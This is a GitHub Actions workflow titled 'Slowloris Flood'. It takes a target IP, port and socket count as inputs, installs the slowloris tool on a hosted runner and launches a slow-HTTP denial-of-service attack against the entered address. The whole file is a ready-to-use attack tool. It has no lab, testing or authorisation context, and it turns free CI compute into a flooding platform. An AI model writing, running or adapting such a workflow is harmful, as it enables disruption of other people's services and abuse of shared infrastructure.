name: Slowloris Flood

on:
  workflow_dispatch:
    inputs:
      iptgt:
        description: "IP Target"
        required: true
      portgt:
        description: "Port Target"
        required: true
        default: "80"
      socket:
        description: "Socket Amount"
        required: true
        default: "1000"

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2
    - name: Set up Python 3.9
      uses: actions/setup-python@v2
      with:
        python-version: 3.9
    - name: Install dependencies
      run: |
        sudo python -m pip install --upgrade pip
        sudo pip install slowloris
        if [ -f requirements.txt ]; then sudo pip install -r requirements.txt; fi
    - name: Starting Flood...
      run: |
        sudo slowloris ${{ github.event.inputs.iptgt }} -p ${{ github.event.inputs.portgt }} -s ${{ github.event.inputs.socket }} -ua
